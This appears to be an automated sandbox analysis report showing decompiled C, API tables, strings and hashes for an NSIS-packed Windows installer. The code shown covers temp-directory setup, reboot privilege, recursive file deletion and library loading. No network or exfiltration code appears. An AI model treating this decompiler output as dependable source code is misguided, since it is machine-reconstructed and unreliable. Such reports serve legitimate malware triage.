							if(_t100 == 0x20) {
								L15:
								_t10 =  &_v744;
								 *_t10 = _v744 | 0x00000004;
								__eflags =  *_t10;
								goto L16;
							}
							__eflags = _t100;
							if(_t100 != 0) {
								goto L16;
							}
							goto L15;
						}
						_t101 = _t109[1] & 0x0000ffff;
						__eflags = _t101 - 0x20;
						if(_t101 == 0x20) {
							L11:
							_t7 =  &_v744;
							 *_t7 = _v744 | 0x00000002;
							__eflags =  *_t7;
							goto L12;
						}
						__eflags = _t101;
						if(_t101 != 0) {
							goto L12;
						}
						goto L11;
					} else {
						goto L4;
					}
					do {
						L4:
						_t109 =  &(_t109[1]);
						__eflags =  *_t109 - _t102;
					} while ( *_t109 == _t102);
					goto L5;
				}
				_t103 = 0x4e30c8;
				GetTempPathW(0x2004, 0x4e30c8);
				_t54 = E004037F8(_t104, _t120);
				_t121 = _t54;
				if(_t54 != 0) {
					L24:
					DeleteFileW(0x4df0c0); // executed
					_t56 = E004035B3(_t122, _v744); // executed
					_v752 = _t56;
					if(_t56 != 0) {
						L34:
						E00403885(); // executed
						__imp__OleUninitialize(); // executed
						if(_v748 == 0) {
							__eflags =  *0x47eb74;
							if( *0x47eb74 != 0) {
								_t103 = E00406328(3);
								_t112 = E00406328(4);
								_t107 = E00406328(5);
								__eflags = _t103;
								if(_t103 != 0) {
									__eflags = _t112;
									if(_t112 != 0) {
										__eflags = _t107;
										if(_t107 != 0) {
											_t83 =  *_t103(GetCurrentProcess(), 0x28,  &_v736);
											__eflags = _t83;
											if(_t83 != 0) {
												 *_t112(0, L"SeShutdownPrivilege",  &_v740);
												_v756 = 1;
												_v744 = 2;
												 *_t107(_v760, 0,  &_v756, 0, 0, 0);
											}
										}
									}
								}
								_t79 = ExitWindowsEx(2, 0);
								__eflags = _t79;
								if(_t79 == 0) {
									E0040141D(9);
								}
							}
							_t58 =  *0x47eb8c;
							__eflags = _t58 - 0xffffffff;
							if(_t58 != 0xffffffff) {
								_v740 = _t58;
							}
							_push(_v740);
						} else {
							E00405CCC(_v748, 0x200010);
							_push(2); // executed
						}
						ExitProcess(); // executed
					}
					if( *0x47eb04 == 0) {
						L33:
						 *0x47eb8c =  *0x47eb8c | 0xffffffff;
						_v740 = E00405958(_t104);
						E00406113(_t104, 1);
						goto L34;
					}
					_t114 = E00405D32(0x4cf0a0, 0);
					while(_t114 >= 0x4cf0a0) {
						_t92 = E0040382C(_t114, L" _?=", 4);
						_t117 = _t117 + 0xc;
						__eflags = _t92;
						if(__eflags == 0) {
							break;
						}
						_t114 = _t114 - 2;
						__eflags = _t114;
					}
					_v748 = L"Error launching installer";
					_t126 = _t114 - 0x4cf0a0;
					if(_t114 < 0x4cf0a0) {
						lstrcatW(_t103, L"~nsu.tmp");
						if(lstrcmpiW(_t103, 0x4db0b8) == 0) {
							goto L34;
						}
						CreateDirectoryW(_t103, 0);
						SetCurrentDirectoryW(_t103);
						if( *0x4d30a8 == 0) {
							E00406035(0x4d30a8, 0x4db0b8);
						}
						E00406035(0x47f000, _v736);
						E00406035(0x483008, "A");
						_t106 = 0x1a;
						do {
							E00406831(_t103, _t106, 0x43dd40, 0x43dd40,  *((intOrPtr*)( *0x47eabc + 0x120)));
							DeleteFileW(0x43dd40);
							if(_v756 != 0 && CopyFileW(0x4eb0d8, 0x43dd40, 1) != 0) {
								E00406C94(0x43dd40, 0);
								E00406831(_t103, _t106, 0x43dd40, 0x43dd40,  *((intOrPtr*)( *0x47eabc + 0x124)));
								_t73 = E00405C6B(0x43dd40);
								if(_t73 != 0) {
									CloseHandle(_t73);
									_v748 = 0;
								}
							}
							 *0x483008 =  *0x483008 + 1;
							_t106 = _t106 - 1;
						} while (_t106 != 0);
						E00406C94(_t103, 0);
						goto L34;
					}
					 *_t114 = 0;
					_t115 =  &(_t114[4]);
					if(E004067AA(_t126,  &(_t114[4])) == 0) {
						goto L34;
					}
					E00406035(0x4d30a8, _t115);
					E00406035(0x4d70b0, _t115);
					_v764 = 0;
					goto L33;
				}
				GetWindowsDirectoryW(0x4e30c8, 0x1fff);
				lstrcatW(0x4e30c8, L"\\Temp");
				_t99 = E004037F8(_t104, _t121);
				_t122 = _t99;
				if(_t99 == 0) {
					goto L34;
				}
				goto L24;
			}

0x004038af
0x004038bd
0x004038be
0x004038c2
0x004038ca
0x004038ce
0x004038d9
0x004038e0
0x004038e8
0x004038f8
0x00403908
0x00403918
0x0040392a
0x0040393e
0x00403943
0x00403945
0x00403949
0x0040394a
0x0040394a
0x0040395d
0x0040395f
0x004039f6
0x004039f6
0x004039f9
0x004039fc
0x00403a02
0x00403a02
0x0040396a
0x0040396b
0x0040396e
0x00403978
0x00403978
0x0040397c
0x00403980
0x00403980
0x00403983
0x00403983
0x00403984
0x00403988
0x004039e4
0x004039eb
0x004039ed
0x004039f1
0x004039f3
0x004039f3
0x004039f3
0x00000000
0x004039f1
0x0040398a
0x0040398d
0x00403991
0x004039a6
0x004039ae
0x004039b3
0x004039b6
0x004039b8
0x004039cd
0x004039cf
0x004039d8
0x004039dd
0x004039e0
0x004039e2
0x00403a06
0x00403a0b
0x00403a10
0x00403a13
0x00403a1c
0x00000000
0x00403a1c
0x00000000
0x004039e2
0x004039ba
0x004039be
0x004039c1
0x004039c8
0x004039c8
0x004039c8
0x004039c8
0x00000000
0x004039c8
0x004039c3
0x004039c6
0x00000000
0x00000000
0x00000000
0x004039c6
0x00403993
0x00403997
0x0040399a
0x004039a1
0x004039a1
0x004039a1
0x004039a1
0x00000000
0x004039a1
0x0040399c
0x0040399f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00403970
0x00403970
0x00403970
0x00403973
0x00403973
0x00000000
0x00403970
0x00403a21
0x00403a2c
0x00403a32
0x00403a37
0x00403a39
0x00403a5f
0x00403a64
0x00403a6e
0x00403a73
0x00403a79
0x00403af8
0x00403af8
0x00403afd
0x00403b07
0x00403bfa
0x00403c00
0x00403c0b
0x00403c14
0x00403c1b
0x00403c1d
0x00403c1f
0x00403c21
0x00403c23
0x00403c25
0x00403c27
0x00403c37
0x00403c39
0x00403c3b
0x00403c48
0x00403c57
0x00403c5f
0x00403c67
0x00403c67
0x00403c3b
0x00403c27
0x00403c23
0x00403c6c
0x00403c72
0x00403c74
0x00403c78
0x00403c78
0x00403c74
0x00403c7d
0x00403c82
0x00403c85
0x00403c87
0x00403c87
0x00403c8b
0x00403b0d
0x00403b16
0x00403b1b
0x00403b1b
0x00403b1d
0x00403b1d
0x00403a81
0x00403ae1
0x00403ae1
0x00403aef
0x00403af3
0x00000000
0x00403af3
0x00403a8a
0x00403aa5
0x00403a96
0x00403a9b
0x00403a9e
0x00403aa0
0x00000000
0x00000000
0x00403aa2
0x00403aa2
0x00403aa2
0x00403aa9
0x00403ab1
0x00403ab3
0x00403b29
0x00403b3d
0x00000000
0x00000000
0x00403b41
0x00403b48
0x00403b55
0x00403b5d
0x00403b5d
0x00403b6b
0x00403b7a
0x00403b81
0x00403b87
0x00403b93
0x00403b99
0x00403ba3
0x00403bb9
0x00403bca
0x00403bd0
0x00403bd7
0x00403bda
0x00403be0
0x00403be0
0x00403bd7
0x00403be4
0x00403beb
0x00403beb
0x00403bf0
0x00000000
0x00403bf0
0x00403ab7
0x00403aba
0x00403ac5
0x00000000
0x00000000
0x00403acd
0x00403ad8
0x00403add
0x00000000
0x00403add
0x00403a41
0x00403a4d
0x00403a52
0x00403a57
0x00403a59
0x00000000
0x00000000
0x00000000

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
OleUninitialize.OLE32(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
ExitWindowsEx.USER32 ref: 00403C6C

Strings

SeShutdownPrivilege, xrefs: 00403C42
Error launching installer, xrefs: 00403AA9
NSIS Error, xrefs: 0040390E
_?=, xrefs: 00403A90
NCRC, xrefs: 004039A8
\Temp, xrefs: 00403A47
~nsu.tmp, xrefs: 00403B23
/D=, xrefs: 004039D2

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
API String ID: 2435955865-3712954417
Opcode ID: a2404dc93c360a7d828092944ab0dc425f3ae1eb0dcb292821f45ffcff0aa10c
Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
Opcode Fuzzy Hash: a2404dc93c360a7d828092944ab0dc425f3ae1eb0dcb292821f45ffcff0aa10c
Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406CC7, Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190
filestringCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00406CC7(void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				WCHAR* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAW _v608;
				signed int _t40;
				signed int _t50;
				signed int* _t54;
				signed int _t58;
				signed int _t61;
				signed int _t69;
				signed int _t71;
				void* _t73;
				signed int _t76;
				signed int _t78;
				WCHAR* _t93;
				short* _t98;

				_t93 = _a4;
				_t40 = E004067AA(__eflags, _t93);
				_v16 = _t40;
				if((_a8 & 0x00000008) != 0) {
					_t71 = DeleteFileW(_t93); // executed
					asm("sbb eax, eax");
					_t73 =  ~_t71 + 1;
					 *0x47eb68 =  *0x47eb68 + _t73;
					return _t73;
				}
				_t76 = _a8 & 0x00000001;
				__eflags = _t76;
				_v8 = _t76;
				if(_t76 == 0) {
					L5:
					E00406035(0x467470, _t93);
					__eflags = _t76;
					if(_t76 == 0) {
						E0040677D(_t93);
					} else {
						lstrcatW(0x467470, L"\\*.*");
					}
					__eflags =  *_t93;
					if( *_t93 != 0) {
						L10:
						lstrcatW(_t93, "\\");
						L11:
						_v12 =  &(_t93[lstrlenW(_t93)]);
						_t40 = FindFirstFileW(0x467470,  &_v608); // executed
						_a4 = _t40;
						__eflags = _t40 - 0xffffffff;
						if(_t40 == 0xffffffff) {
							_t78 = 0;
							__eflags = 0;
							L30:
							__eflags = _v8 - _t78;
							if(_v8 != _t78) {
								_t40 = 0;
								__eflags = 0;
								 *((short*)(_v12 - 2)) = 0;
							}
							goto L32;
						} else {
							goto L12;
						}
						do {
							L12:
							_t98 =  &(_v608.cFileName);
							_t54 = E00405D32(_t98, 0x3f);
							_t78 = 0;
							__eflags =  *_t54;
							if( *_t54 != 0) {
								__eflags = _v608.cAlternateFileName;
								if(_v608.cAlternateFileName != 0) {
									_t98 =  &(_v608.cAlternateFileName);
								}
							}
							__eflags =  *_t98 - 0x2e;
							if( *_t98 != 0x2e) {
								L19:
								E00406035(_v12, _t98);
								__eflags = _v608.dwFileAttributes & 0x00000010;
								if((_v608.dwFileAttributes & 0x00000010) == 0) {
									E004062CF(L"Delete: DeleteFile(\"%s\")", _t93);
									E00405E5C(_t93);
									_t58 = DeleteFileW(_t93); // executed
									_push(_t93);
									__eflags = _t58;
									if(_t58 != 0) {
										_push(0xfffffff2);
										E00404F9E();
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											_push(L"Delete: DeleteFile failed(\"%s\")");
											E004062CF();
											 *0x47eb68 =  *0x47eb68 + 1;
										} else {
											_push(L"Delete: DeleteFile on Reboot(\"%s\")");
											E004062CF();
											E00404F9E(0xfffffff1, _t93);
											E00406C94(_t93, _t78);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00406CC7(__eflags, _t93, _a8);
									}
								}
								goto L27;
							}
							_t69 =  *(_t98 + 2) & 0x0000ffff;
							__eflags = _t69 - _t78;
							if(_t69 == _t78) {
								goto L27;
							}
							__eflags = _t69 - 0x2e;
							if(_t69 != 0x2e) {
								goto L19;
							}
							__eflags =  *((intOrPtr*)(_t98 + 4)) - _t78;
							if( *((intOrPtr*)(_t98 + 4)) == _t78) {
								goto L27;
							}
							goto L19;
							L27:
							_t61 = FindNextFileW(_a4,  &_v608); // executed
							__eflags = _t61;
						} while (_t61 != 0);
						_t40 = FindClose(_a4);
						goto L30;
					}
					__eflags =  *0x467470 - 0x5c;
					if( *0x467470 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L32:
						__eflags = _v8;
						if(_v8 == 0) {
							L42:
							return _t40;
						}
						_push(_t93);
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E00406301();
							__eflags = _t40;
							if(_t40 == 0) {
								goto L42;
							}
							E0040674E(_t93);
							E004062CF(L"RMDir: RemoveDirectory(\"%s\")", _t93);
							E00405E5C(_t93);
							_t50 = RemoveDirectoryW(_t93); // executed
							_push(_t93);
							__eflags = _t50;
							if(_t50 != 0) {
								_push(0xffffffe5);
								_t40 = E00404F9E();
								goto L42;
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								_push(L"RMDir: RemoveDirectory failed(\"%s\")");
								L40:
								_t40 = E004062CF();
								 *0x47eb68 =  *0x47eb68 + 1;
								goto L42;
							}
							_push(L"RMDir: RemoveDirectory on Reboot(\"%s\")");
							E004062CF();
							E00404F9E(0xfffffff1, _t93);
							_t40 = E00406C94(_t93, 0);
							goto L42;
						}
						_push(L"RMDir: RemoveDirectory invalid input(\"%s\")");
						goto L40;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L32;
					}
					goto L5;
				}
			}

0x00406cd1
0x00406cd5
0x00406cde
0x00406ce1
0x00406ce4
0x00406cec
0x00406cee
0x00406cef
0x00000000
0x00406cef
0x00406cfe
0x00406cfe
0x00406d02
0x00406d05
0x00406d19
0x00406d20
0x00406d25
0x00406d2d
0x00406d3a
0x00406d2f
0x00406d35
0x00406d35
0x00406d3f
0x00406d43
0x00406d4f
0x00406d55
0x00406d57
0x00406d61
0x00406d6c
0x00406d72
0x00406d75
0x00406d78
0x00406e67
0x00406e67
0x00406e69
0x00406e69
0x00406e6c
0x00406e71
0x00406e71
0x00406e73
0x00406e73
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d7e
0x00406d7e
0x00406d7e
0x00406d89
0x00406d8e
0x00406d90
0x00406d93
0x00406d95
0x00406d99
0x00406d9b
0x00406d9b
0x00406d99
0x00406d9e
0x00406da2
0x00406dc0
0x00406dc4
0x00406dc9
0x00406dd0
0x00406ded
0x00406df5
0x00406dfb
0x00406e01
0x00406e02
0x00406e04
0x00406e3d
0x00406e3f
0x00406e06
0x00406e06
0x00406e0a
0x00406e29
0x00406e2e
0x00406e33
0x00406e0c
0x00406e0c
0x00406e11
0x00406e1b
0x00406e22
0x00406e22
0x00406e0a
0x00406dd2
0x00406dd8
0x00406dda
0x00406de0
0x00406de0
0x00406dda
0x00000000
0x00406dd0
0x00406da4
0x00406da8
0x00406dab
0x00000000
0x00000000
0x00406db1
0x00406db4
0x00000000
0x00000000
0x00406db6
0x00406dba
0x00000000
0x00000000
0x00000000
0x00406e44
0x00406e4e
0x00406e54
0x00406e54
0x00406e5f
0x00000000
0x00406e5f
0x00406d45
0x00406d4d
0x00000000
0x00000000
0x00000000
0x00406d07
0x00406d07
0x00406d09
0x00406e77
0x00406e79
0x00406e7c
0x00406ef7
0x00000000
0x00406ef8
0x00406e7e
0x00406e7f
0x00406e82
0x00406e8b
0x00406e90
0x00406e92
0x00000000
0x00000000
0x00406e95
0x00406ea0
0x00406ea8
0x00406eae
0x00406eb4
0x00406eb5
0x00406eb7
0x00406ef0
0x00406ef2
0x00000000
0x00406ef2
0x00406eb9
0x00406ebd
0x00406edc
0x00406ee1
0x00406ee1
0x00406ee6
0x00000000
0x00406eed
0x00406ebf
0x00406ec4
0x00406ece
0x00406ed5
0x00000000
0x00406ed5
0x00406e84
0x00000000
0x00406e84
0x00406d0f
0x00406d13
0x00000000
0x00000000
0x00000000
0x00406d13

APIs

DeleteFileW.KERNELBASE(?,?,004CF0A0), ref: 00406CE4
lstrcatW.KERNEL32(00467470,\*.*), ref: 00406D35
lstrcatW.KERNEL32(?,00409838), ref: 00406D55
lstrlenW.KERNEL32(?), ref: 00406D58
FindFirstFileW.KERNELBASE(00467470,?), ref: 00406D6C
FindNextFileW.KERNELBASE(?,00000010,000000F2,?), ref: 00406E4E
FindClose.KERNEL32(?), ref: 00406E5F

Strings

RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
ptF, xrefs: 00406D1A
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
Delete: DeleteFile("%s"), xrefs: 00406DE8
Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
\*.*, xrefs: 00406D2F
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
Delete: DeleteFile failed("%s"), xrefs: 00406E29

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
API String ID: 2035342205-1650287579
Opcode ID: 0773e1bb02d94fce99ad1c6111755f8979c63676e37ea285c86d1b4844ce1413
Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
Opcode Fuzzy Hash: 0773e1bb02d94fce99ad1c6111755f8979c63676e37ea285c86d1b4844ce1413
Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

Uniqueness

Uniqueness Score: -1.00%

Function 00406301, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406301(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x466a20); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2); // executed
				return 0x466a20;
			}

0x0040630c
0x00406315
0x00000000
0x00406322
0x00406318
0x00000000

APIs

FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
FindClose.KERNELBASE(00000000), ref: 00406318

Strings

jF, xrefs: 00406302

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID: jF
API String ID: 2295610775-3349280890
Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

Uniqueness

Uniqueness Score: -1.00%

Function 00406328, Relevance: 4.5, APIs: 3, Instructions: 18
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406328(signed int _a4) {
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				signed int _t9;

				_t9 = _a4;
				_t8 =  *(0x40c060 + _t9 * 8);
				_t6 = GetModuleHandleA(_t8);
				if(_t6 != 0) {
					L2:
					return GetProcAddress(_t6,  *(0x40c064 + _t9 * 8));
				}
				_t6 = LoadLibraryA(_t8); // executed
				if(_t6 != 0) {
					goto L2;
				}
				return _t6;
			}

0x00406329
0x0040632e
0x00406336
0x0040633e
0x0040634b
0x00000000
0x00406353
0x00406341
0x00406349
0x00000000
0x00000000
0x0040635b

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 0000000D.00000002.385407365.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.385394869.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385426913.0000000000409000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.385438977.000000000040C000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385450587.0000000000420000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385493977.000000000046B000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.385514327.0000000000560000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Uniqueness

Uniqueness Score: -1.00%

Function 004015A0, Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E004015A0(void _a4, char _a7) {
				RECT* _v8;
				long _v12;
				short _v16;
				long _v20;
				long _v24;
				signed int _v28;
				struct _FILETIME _v36;
				signed int _v40;
				long _v44;
				signed int _v48;
				void _v52;
				int _v56;
				DWORD* _v60;
				signed char _v61;
				intOrPtr _v70;
				struct _SHFILEOPSTRUCTW _v96;
				char _v352;
				struct _WIN32_FIND_DATAW _v944;
				short _t504;
				signed int _t508;
				signed int _t514;
				signed int _t519;

				_t514 = 7;
				_t504 = memcpy( &_v52, _a4, _t514 << 2);
				_t519 = _v48;
				_v16 = _t504;
				 *0x40c0e4 =  &_v48;
				_t508 = _v52 + 0xfffffffe;
				_v8 = 0;
				if(_t508 > 0x47) {
					L430:
					 *0x47eb68 = _v8 +  *0x47eb68;
					L431:
					return 0;
				}
				switch( *((intOrPtr*)(_t508 * 4 +  &M004030F8))) {
					case 0:
						E004062CF(L"Jump: %d", _t519);
						return _v48;
					case 1:
						E0040145C(__edx, 0) = E004062CF(L"Aborting: \"%s\"", __eax);
						_pop(__ecx);
						_pop(__ecx);
						_push(0);
						_push(_v48);
						goto L4;
					case 2:
						 *0x476a74 =  *0x476a74 + 1;
						__eflags = _v16;
						if(_v16 != 0) {
							PostQuitMessage(0);
						}
						goto L5;
					case 3:
						_t15 = E0040137E(__edx) - 1; // -1
						__esi = _t15;
						__eax = E004062CF(L"Call: %d", _t15);
						_pop(__ecx);
						_pop(__ecx);
						_push(0);
						return E0040139D(_t15);
					case 4:
						E0040145C(__edx, 0) = E004062CF(L"detailprint: %s", __eax);
						_pop(__ecx);
						_pop(__ecx);
						_push(0);
						_push(_v48);
						goto L10;
					case 5:
						__ecx = 0;
						__esi = E00401446(0);
						__eax = E004062CF(L"Sleep(%d)", __esi);
						_pop(__ecx);
						_pop(__ecx);
						__eflags = __esi - 1;
						if(__esi <= 1) {
							__esi = 0;
							__esi = 1;
							__eflags = 1;
						}
						Sleep(__esi);
						goto L430;
					case 6:
						_push(L"BringToFront");
						__eax = E004062CF();
						_pop(__ecx);
						__eax = SetForegroundWindow(_v16);
						goto L430;
					case 7:
						__eax =  *0x476a80;
						__esi = ShowWindow;
						__eflags = __eax;
						if(__eax != 0) {
							__eax = ShowWindow(__eax, __ecx);
							__edx = _v48;
						}
						__eax =  *0x476a6c;
						__eflags = __eax - __ebx;
						if(__eax != __ebx) {
							__eax = ShowWindow(__eax, __edx);
						}
						goto L430;
					case 8:
						__eax = E0040145C(__edx, 0xfffffff0);
						_push(_v44);
						__esi = __eax;
						__eax = E004062CF(L"SetFileAttributes: \"%s\":%08X", __esi);
						__eax = SetFileAttributesW(__esi, _v44);
						__eflags = __eax;
						if(__eax != 0) {
							goto L430;
						} else {
							_v8 = 1;
							_push(L"SetFileAttributes failed.");
							goto L26;
						}
					case 9:
						__eax = E0040145C(__edx, 0xfffffff0);
						_push(_v44);
						_a4 = __eax;
						__eax = E004062CF(L"CreateDirectory: \"%s\" (%d)", __eax);
						__esi = E00405D85(_a4);
						__eflags = __esi;
						if(__esi == 0) {
							L37:
							_push(0x4100f0);
							__eflags = _v44 - __ebx;
							if(_v44 == __ebx) {
								_push(0xfffffff5);
								goto L10;
							} else {
								_push(0xffffffe6);
								E00404F9E() = E00406035(0x4d70b0, _a4);
								__eax = SetCurrentDirectoryW(_a4); // executed
								goto L430;
							}
						} else {
							goto L29;
						}
						do {
							L29:
							__esi = E00405D32(__esi, 0x5c);
							__edi =  *__esi & 0x0000ffff;
							__eax = 0;
							 *__esi = __ax; // executed
							__eax = CreateDirectoryW(_a4, __ebx); // executed
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E004062CF(L"CreateDirectory: \"%s\" created", _a4);
								L35:
								_pop(__ecx);
								_pop(__ecx);
								goto L36;
							}
							__eax = GetLastError();
							__eflags = __eax - 0xb7;
							if(__eax == 0xb7) {
								__eax = GetFileAttributesW(_a4); // executed
								__eflags = __al & 0x00000010;
								if((__al & 0x00000010) != 0) {
									goto L36;
								} else {
									__eax = E004062CF(L"CreateDirectory: can\'t create \"%s\" - a file already exists", _a4);
									_v8 =  &(_v8->left);
									goto L35;
								}
							} else {
								_push(GetLastError());
								__eax = E004062CF(L"CreateDirectory: can\'t create \"%s\" (err=%d)", _a4);
								_v8 =  &(_v8->left);
							}
							L36:
							 *__esi = __di;
							__esi =  &(__esi[1]);
							__eflags = __di - __bx;
						} while (__di != __bx);
						goto L37;
					case 0xa:
						__esi = E0040145C(__edx, 0);
						__eax = E00406301(__eax);
						__eflags = __eax;
						if(__eax == 0) {
							_push(_v40);
